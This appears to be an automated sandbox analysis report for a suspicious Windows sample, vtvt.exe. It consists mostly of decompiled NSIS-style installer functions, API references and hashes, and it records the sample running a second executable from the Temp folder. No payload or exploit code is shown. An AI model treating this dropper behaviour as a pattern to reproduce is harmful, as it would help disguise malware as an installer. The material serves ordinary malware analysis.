                                                                                    0x004047d0
                                                                                    0x004047d3
                                                                                    0x004047da
                                                                                    0x004047dc
                                                                                    0x004047dc
                                                                                    0x004047e6
                                                                                    0x004047f3
                                                                                    0x004047fd
                                                                                    0x00404802
                                                                                    0x00404805
                                                                                    0x0040480a
                                                                                    0x00404821
                                                                                    0x00404828
                                                                                    0x0040483b
                                                                                    0x0040483e
                                                                                    0x00404852
                                                                                    0x00404859
                                                                                    0x0040485e
                                                                                    0x00404863
                                                                                    0x00404863
                                                                                    0x00404871
                                                                                    0x0040487f
                                                                                    0x00404891
                                                                                    0x00404896
                                                                                    0x004048a6
                                                                                    0x004048a8
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • CheckDlgButton.USER32 ref: 00404821
                                                                                    • GetDlgItem.USER32 ref: 00404835
                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                                                    • GetSysColor.USER32(?), ref: 00404863
                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                                                    • lstrlenW.KERNEL32(?), ref: 00404884
                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                                                    • GetDlgItem.USER32 ref: 004048FF
                                                                                    • SendMessageW.USER32(00000000), ref: 00404906
                                                                                    • GetDlgItem.USER32 ref: 00404931
                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                                                    • SetCursor.USER32(00000000), ref: 00404985
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                                                    • SetCursor.USER32(00000000), ref: 004049A1
                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                                                    Strings
                                                                                    • N, xrefs: 0040491F
                                                                                    • "C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c, xrefs: 00404960
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                    • String ID: "C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c$N
                                                                                    • API String ID: 3103080414-2181220887
                                                                                    • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                                    • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                                                    • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                                    • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004062AE(void* __ecx) {
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				long _t12;
                                                                                    				long _t24;
                                                                                    				char* _t31;
                                                                                    				int _t37;
                                                                                    				void* _t38;
                                                                                    				intOrPtr* _t39;
                                                                                    				long _t42;
                                                                                    				WCHAR* _t44;
                                                                                    				void* _t46;
                                                                                    				void* _t48;
                                                                                    				void* _t49;
                                                                                    				void* _t52;
                                                                                    				void* _t53;
                                                                                    
                                                                                    				_t38 = __ecx;
                                                                                    				_t44 =  *(_t52 + 0x14);
                                                                                    				 *0x426de8 = 0x55004e;
                                                                                    				 *0x426dec = 0x4c;
                                                                                    				if(_t44 == 0) {
                                                                                    					L3:
                                                                                    					_t2 = _t52 + 0x1c; // 0x4275e8
                                                                                    					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
                                                                                    					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                    						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
                                                                                    						_t53 = _t52 + 0x10;
                                                                                    						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
                                                                                    						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
                                                                                    						_t48 = _t12;
                                                                                    						 *(_t53 + 0x18) = _t48;
                                                                                    						if(_t48 != 0xffffffff) {
                                                                                    							_t42 = GetFileSize(_t48, 0);
                                                                                    							_t6 = _t37 + 0xa; // 0xa
                                                                                    							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                                    							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
                                                                                    								L18:
                                                                                    								return CloseHandle(_t48);
                                                                                    							} else {
                                                                                    								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                                    									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
                                                                                    									if(_t49 == 0) {
                                                                                    										_t48 =  *(_t53 + 0x18);
                                                                                    										L16:
                                                                                    										_t24 = _t42;
                                                                                    										L17:
                                                                                    										E00406113(_t24 + _t46, 0x4269e8, _t37);
                                                                                    										SetFilePointer(_t48, 0, 0, 0);
                                                                                    										E0040620A(_t48, _t46, _t42 + _t37);
                                                                                    										GlobalFree(_t46);
                                                                                    										goto L18;
                                                                                    									}
                                                                                    									_t39 = _t46 + _t42;
                                                                                    									_t31 = _t39 + _t37;
                                                                                    									while(_t39 > _t49) {
                                                                                    										 *_t31 =  *_t39;
                                                                                    										_t31 = _t31 - 1;
                                                                                    										_t39 = _t39 - 1;
                                                                                    									}
                                                                                    									_t24 = _t49 - _t46 + 1;
                                                                                    									_t48 =  *(_t53 + 0x18);
                                                                                    									goto L17;
                                                                                    								}
                                                                                    								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                                    								_t42 = _t42 + 0xa;
                                                                                    								goto L16;
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					CloseHandle(E00406158(_t44, 0, 1));
                                                                                    					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
                                                                                    					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                    						goto L3;
                                                                                    					}
                                                                                    				}
                                                                                    				return _t12;
                                                                                    			}



















                                                                                    0x004062ae
                                                                                    0x004062b7
                                                                                    0x004062be
                                                                                    0x004062c8
                                                                                    0x004062dc
                                                                                    0x00406304
                                                                                    0x0040630b
                                                                                    0x0040630f
                                                                                    0x00406313
                                                                                    0x00406333
                                                                                    0x0040633a
                                                                                    0x00406344
                                                                                    0x00406351
                                                                                    0x00406356
                                                                                    0x0040635b
                                                                                    0x0040635f
                                                                                    0x0040636e
                                                                                    0x00406370
                                                                                    0x0040637d
                                                                                    0x00406381
                                                                                    0x0040641c
                                                                                    0x00000000
                                                                                    0x00406397
                                                                                    0x004063a4
                                                                                    0x004063c8
                                                                                    0x004063cc
                                                                                    0x004063eb
                                                                                    0x004063ef
                                                                                    0x004063ef
                                                                                    0x004063f1
                                                                                    0x004063fa
                                                                                    0x00406405
                                                                                    0x00406410
                                                                                    0x00406416
                                                                                    0x00000000
                                                                                    0x00406416
                                                                                    0x004063ce
                                                                                    0x004063d1
                                                                                    0x004063dc
                                                                                    0x004063d8
                                                                                    0x004063da
                                                                                    0x004063db
                                                                                    0x004063db
                                                                                    0x004063e3
                                                                                    0x004063e5
                                                                                    0x00000000
                                                                                    0x004063e5
                                                                                    0x004063af
                                                                                    0x004063b5
                                                                                    0x00000000
                                                                                    0x004063b5
                                                                                    0x00406381
                                                                                    0x0040635f
                                                                                    0x004062de
                                                                                    0x004062e9
                                                                                    0x004062f2
                                                                                    0x004062f6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004062f6
                                                                                    0x00406427

                                                                                    APIs
                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                                                    • GetShortPathNameW.KERNEL32 ref: 004062F2
                                                                                      • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                      • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                                    • GetShortPathNameW.KERNEL32 ref: 0040630F
                                                                                    • wsprintfA.USER32 ref: 0040632D
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                                                    • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                                                    • GlobalFree.KERNEL32 ref: 00406416
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                                                                      • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\AppData\Roaming\vtvt.exe,80000000,00000003), ref: 0040615C
                                                                                      • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                    • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                                                    • API String ID: 2171350718-2295842750
                                                                                    • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                                                    • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                                                    • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                                                    • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 90%
                                                                                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                    				struct tagLOGBRUSH _v16;
                                                                                    				struct tagRECT _v32;
                                                                                    				struct tagPAINTSTRUCT _v96;
                                                                                    				struct HDC__* _t70;
                                                                                    				struct HBRUSH__* _t87;
                                                                                    				struct HFONT__* _t94;
                                                                                    				long _t102;
                                                                                    				signed int _t126;
                                                                                    				struct HDC__* _t128;
                                                                                    				intOrPtr _t130;
                                                                                    
                                                                                    				if(_a8 == 0xf) {
                                                                                    					_t130 =  *0x42a270;
                                                                                    					_t70 = BeginPaint(_a4,  &_v96);
                                                                                    					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                    					_a8 = _t70;
                                                                                    					GetClientRect(_a4,  &_v32);
                                                                                    					_t126 = _v32.bottom;
                                                                                    					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                    					while(_v32.top < _t126) {
                                                                                    						_a12 = _t126 - _v32.top;
                                                                                    						asm("cdq");
                                                                                    						asm("cdq");
                                                                                    						asm("cdq");
                                                                                    						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                    						_t87 = CreateBrushIndirect( &_v16);
                                                                                    						_v32.bottom = _v32.bottom + 4;
                                                                                    						_a16 = _t87;
                                                                                    						FillRect(_a8,  &_v32, _t87);
                                                                                    						DeleteObject(_a16);
                                                                                    						_v32.top = _v32.top + 4;
                                                                                    					}
                                                                                    					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                    						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                                                    						_a16 = _t94;
                                                                                    						if(_t94 != 0) {
                                                                                    							_t128 = _a8;
                                                                                    							_v32.left = 0x10;
                                                                                    							_v32.top = 8;
                                                                                    							SetBkMode(_t128, 1);
                                                                                    							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                    							_a8 = SelectObject(_t128, _a16);
                                                                                    							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
                                                                                    							SelectObject(_t128, _a8);
                                                                                    							DeleteObject(_a16);
                                                                                    						}
                                                                                    					}
                                                                                    					EndPaint(_a4,  &_v96);
                                                                                    					return 0;
                                                                                    				}
                                                                                    				_t102 = _a16;
                                                                                    				if(_a8 == 0x46) {
                                                                                    					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                    					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
                                                                                    				}
                                                                                    				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                                                    			}













                                                                                    0x0040100a
                                                                                    0x00401039
                                                                                    0x00401047
                                                                                    0x0040104d
                                                                                    0x00401051
                                                                                    0x0040105b
                                                                                    0x00401061
                                                                                    0x00401064
                                                                                    0x004010f3
                                                                                    0x00401089
                                                                                    0x0040108c
                                                                                    0x004010a6
                                                                                    0x004010bd
                                                                                    0x004010cc
                                                                                    0x004010cf
                                                                                    0x004010d5
                                                                                    0x004010d9
                                                                                    0x004010e4
                                                                                    0x004010ed
                                                                                    0x004010ef
                                                                                    0x004010ef
                                                                                    0x00401100
                                                                                    0x00401105
                                                                                    0x0040110d
                                                                                    0x00401110
                                                                                    0x00401112
                                                                                    0x00401118
                                                                                    0x0040111f
                                                                                    0x00401126
                                                                                    0x00401130
                                                                                    0x00401142
                                                                                    0x00401156
                                                                                    0x00401160
                                                                                    0x00401165
                                                                                    0x00401165
                                                                                    0x00401110
                                                                                    0x0040116e
                                                                                    0x00000000
                                                                                    0x00401178
                                                                                    0x00401010
                                                                                    0x00401013
                                                                                    0x00401015
                                                                                    0x0040101f
                                                                                    0x0040101f
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                    • GetClientRect.USER32 ref: 0040105B
                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                    • FillRect.USER32 ref: 004010E4
                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                    • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                    • String ID: F
                                                                                    • API String ID: 941294808-1304234792
                                                                                    • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                                    • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                                                    • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                                    • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 72%
                                                                                    			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                                                                    				struct _ITEMIDLIST* _v8;
                                                                                    				signed int _v12;
                                                                                    				signed int _v16;
                                                                                    				signed int _v20;
                                                                                    				signed int _v24;
                                                                                    				signed int _v28;
                                                                                    				signed int _t44;
                                                                                    				WCHAR* _t45;
                                                                                    				signed char _t47;
                                                                                    				signed int _t48;
                                                                                    				short _t59;
                                                                                    				short _t61;
                                                                                    				short _t63;
                                                                                    				void* _t71;
                                                                                    				signed int _t77;
                                                                                    				signed int _t78;
                                                                                    				short _t81;
                                                                                    				short _t82;
                                                                                    				signed char _t84;
                                                                                    				signed int _t85;
                                                                                    				void* _t98;
                                                                                    				void* _t104;
                                                                                    				intOrPtr* _t105;
                                                                                    				void* _t107;
                                                                                    				WCHAR* _t108;
                                                                                    				void* _t110;
                                                                                    
                                                                                    				_t107 = __esi;
                                                                                    				_t104 = __edi;
                                                                                    				_t71 = __ebx;
                                                                                    				_t44 = _a8;
                                                                                    				if(_t44 < 0) {
                                                                                    					_t44 =  *( *0x42923c - 4 + _t44 * 4);
                                                                                    				}
                                                                                    				_push(_t71);
                                                                                    				_push(_t107);
                                                                                    				_push(_t104);
                                                                                    				_t105 =  *0x42a298 + _t44 * 2;
                                                                                    				_t45 = 0x428200;
                                                                                    				_t108 = 0x428200;
                                                                                    				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
                                                                                    					_t108 = _a4;
                                                                                    					_a4 = _a4 & 0x00000000;
                                                                                    				}
                                                                                    				_t81 =  *_t105;
                                                                                    				_a8 = _t81;
                                                                                    				if(_t81 == 0) {
                                                                                    					L43:
                                                                                    					 *_t108 =  *_t108 & 0x00000000;
                                                                                    					if(_a4 == 0) {
                                                                                    						return _t45;
                                                                                    					}
                                                                                    					return E00406668(_a4, _t45);
                                                                                    				} else {
                                                                                    					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                                                                    						_t98 = 2;
                                                                                    						_t105 = _t105 + _t98;
                                                                                    						if(_t81 >= 4) {
                                                                                    							if(__eflags != 0) {
                                                                                    								 *_t108 = _t81;
                                                                                    								_t108 = _t108 + _t98;
                                                                                    								__eflags = _t108;
                                                                                    							} else {
                                                                                    								 *_t108 =  *_t105;
                                                                                    								_t108 = _t108 + _t98;
                                                                                    								_t105 = _t105 + _t98;
                                                                                    							}
                                                                                    							L42:
                                                                                    							_t82 =  *_t105;
                                                                                    							_a8 = _t82;
                                                                                    							if(_t82 != 0) {
                                                                                    								_t81 = _a8;
                                                                                    								continue;
                                                                                    							}
                                                                                    							goto L43;
                                                                                    						}
                                                                                    						_t84 =  *((intOrPtr*)(_t105 + 1));
                                                                                    						_t47 =  *_t105;
                                                                                    						_t48 = _t47 & 0x000000ff;
                                                                                    						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                                                                    						_t85 = _t84 & 0x000000ff;
                                                                                    						_v28 = _t48 | 0x00008000;
                                                                                    						_t77 = 2;
                                                                                    						_v16 = _t85;
                                                                                    						_t105 = _t105 + _t77;
                                                                                    						_v24 = _t48;
                                                                                    						_v20 = _t85 | 0x00008000;
                                                                                    						if(_a8 != _t77) {
                                                                                    							__eflags = _a8 - 3;
                                                                                    							if(_a8 != 3) {
                                                                                    								__eflags = _a8 - 1;
                                                                                    								if(__eflags == 0) {
                                                                                    									__eflags = (_t48 | 0xffffffff) - _v12;
                                                                                    									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                                                                    								}
                                                                                    								L38:
                                                                                    								_t108 =  &(_t108[lstrlenW(_t108)]);
                                                                                    								_t45 = 0x428200;
                                                                                    								goto L42;
                                                                                    							}
                                                                                    							_t78 = _v12;
                                                                                    							__eflags = _t78 - 0x1d;
                                                                                    							if(_t78 != 0x1d) {
                                                                                    								__eflags = (_t78 << 0xb) + 0x42b000;
                                                                                    								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
                                                                                    							} else {
                                                                                    								E004065AF(_t108,  *0x42a268);
                                                                                    							}
                                                                                    							__eflags = _t78 + 0xffffffeb - 7;
                                                                                    							if(__eflags < 0) {
                                                                                    								L29:
                                                                                    								E004068EF(_t108);
                                                                                    							}
                                                                                    							goto L38;
                                                                                    						}
                                                                                    						if( *0x42a2e4 != 0) {
                                                                                    							_t77 = 4;
                                                                                    						}
                                                                                    						_t121 = _t48;
                                                                                    						if(_t48 >= 0) {
                                                                                    							__eflags = _t48 - 0x25;
                                                                                    							if(_t48 != 0x25) {
                                                                                    								__eflags = _t48 - 0x24;
                                                                                    								if(_t48 == 0x24) {
                                                                                    									GetWindowsDirectoryW(_t108, 0x400);
                                                                                    									_t77 = 0;
                                                                                    								}
                                                                                    								while(1) {
                                                                                    									__eflags = _t77;
                                                                                    									if(_t77 == 0) {
                                                                                    										goto L26;
                                                                                    									}
                                                                                    									_t59 =  *0x42a264;
                                                                                    									_t77 = _t77 - 1;
                                                                                    									__eflags = _t59;
                                                                                    									if(_t59 == 0) {
                                                                                    										L22:
                                                                                    										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                                                                    										__eflags = _t61;
                                                                                    										if(_t61 != 0) {
                                                                                    											L24:
                                                                                    											 *_t108 =  *_t108 & 0x00000000;
                                                                                    											__eflags =  *_t108;
                                                                                    											continue;
                                                                                    										}
                                                                                    										__imp__SHGetPathFromIDListW(_v8, _t108);
                                                                                    										_a8 = _t61;
                                                                                    										__imp__CoTaskMemFree(_v8);
                                                                                    										__eflags = _a8;
                                                                                    										if(_a8 != 0) {
                                                                                    											goto L26;
                                                                                    										}
                                                                                    										goto L24;
                                                                                    									}
                                                                                    									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                                                                                    									__eflags = _t63;
                                                                                    									if(_t63 == 0) {
                                                                                    										goto L26;
                                                                                    									}
                                                                                    									goto L22;
                                                                                    								}
                                                                                    								goto L26;
                                                                                    							}
                                                                                    							GetSystemDirectoryW(_t108, 0x400);
                                                                                    							goto L26;
                                                                                    						} else {
                                                                                    							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                                                                                    							if( *_t108 != 0) {
                                                                                    								L27:
                                                                                    								if(_v16 == 0x1a) {
                                                                                    									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                    								}
                                                                                    								goto L29;
                                                                                    							}
                                                                                    							E004066A5(_t77, _t105, _t108, _t108, _v16);
                                                                                    							L26:
                                                                                    							if( *_t108 == 0) {
                                                                                    								goto L29;
                                                                                    							}
                                                                                    							goto L27;
                                                                                    						}
                                                                                    					}
                                                                                    					goto L43;
                                                                                    				}
                                                                                    			}





























                                                                                    0x004066a5
                                                                                    0x004066a5
                                                                                    0x004066a5
                                                                                    0x004066ab
                                                                                    0x004066b0
                                                                                    0x004066c1
                                                                                    0x004066c1
                                                                                    0x004066c9
                                                                                    0x004066ca
                                                                                    0x004066cb
                                                                                    0x004066cc
                                                                                    0x004066cf
                                                                                    0x004066d7
                                                                                    0x004066d9
                                                                                    0x004066ea
                                                                                    0x004066ed
                                                                                    0x004066ed
                                                                                    0x004066f1
                                                                                    0x004066f7
                                                                                    0x004066fa
                                                                                    0x004068d5
                                                                                    0x004068d5
                                                                                    0x004068e0
                                                                                    0x004068ec
                                                                                    0x004068ec
                                                                                    0x00000000
                                                                                    0x00406700
                                                                                    0x00406705
                                                                                    0x0040671a
                                                                                    0x0040671b
                                                                                    0x00406721
                                                                                    0x004068b3
                                                                                    0x004068c1
                                                                                    0x004068c4
                                                                                    0x004068c4
                                                                                    0x004068b5
                                                                                    0x004068b8
                                                                                    0x004068bb
                                                                                    0x004068bd
                                                                                    0x004068bd
                                                                                    0x004068c6
                                                                                    0x004068c6
                                                                                    0x004068cc
                                                                                    0x004068cf
                                                                                    0x00406702
                                                                                    0x00000000
                                                                                    0x00406702
                                                                                    0x00000000
                                                                                    0x004068cf
                                                                                    0x00406727
                                                                                    0x0040672a
                                                                                    0x00406739
                                                                                    0x00406740
                                                                                    0x0040674c
                                                                                    0x0040674f
                                                                                    0x00406752
                                                                                    0x00406753
                                                                                    0x00406758
                                                                                    0x0040675e
                                                                                    0x00406761
                                                                                    0x00406764
                                                                                    0x00406857
                                                                                    0x0040685c
                                                                                    0x0040688f
                                                                                    0x00406894
                                                                                    0x00406899
                                                                                    0x0040689e
                                                                                    0x0040689e
                                                                                    0x004068a3
                                                                                    0x004068a9
                                                                                    0x004068ac
                                                                                    0x00000000
                                                                                    0x004068ac
                                                                                    0x0040685e
                                                                                    0x00406861
                                                                                    0x00406864
                                                                                    0x00406879
                                                                                    0x00406880
                                                                                    0x00406866
                                                                                    0x0040686d
                                                                                    0x0040686d
                                                                                    0x00406888
                                                                                    0x0040688b
                                                                                    0x0040684f
                                                                                    0x00406850
                                                                                    0x00406850
                                                                                    0x00000000
                                                                                    0x0040688b
                                                                                    0x00406771
                                                                                    0x00406775
                                                                                    0x00406775
                                                                                    0x00406776
                                                                                    0x00406778
                                                                                    0x004067b5
                                                                                    0x004067b8
                                                                                    0x004067c8
                                                                                    0x004067cb
                                                                                    0x004067d3
                                                                                    0x004067d9
                                                                                    0x004067d9
                                                                                    0x00406834
                                                                                    0x00406834
                                                                                    0x00406836
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004067dd
                                                                                    0x004067e2
                                                                                    0x004067e3
                                                                                    0x004067e5
                                                                                    0x004067fc
                                                                                    0x0040680a
                                                                                    0x00406810
                                                                                    0x00406812
                                                                                    0x00406830
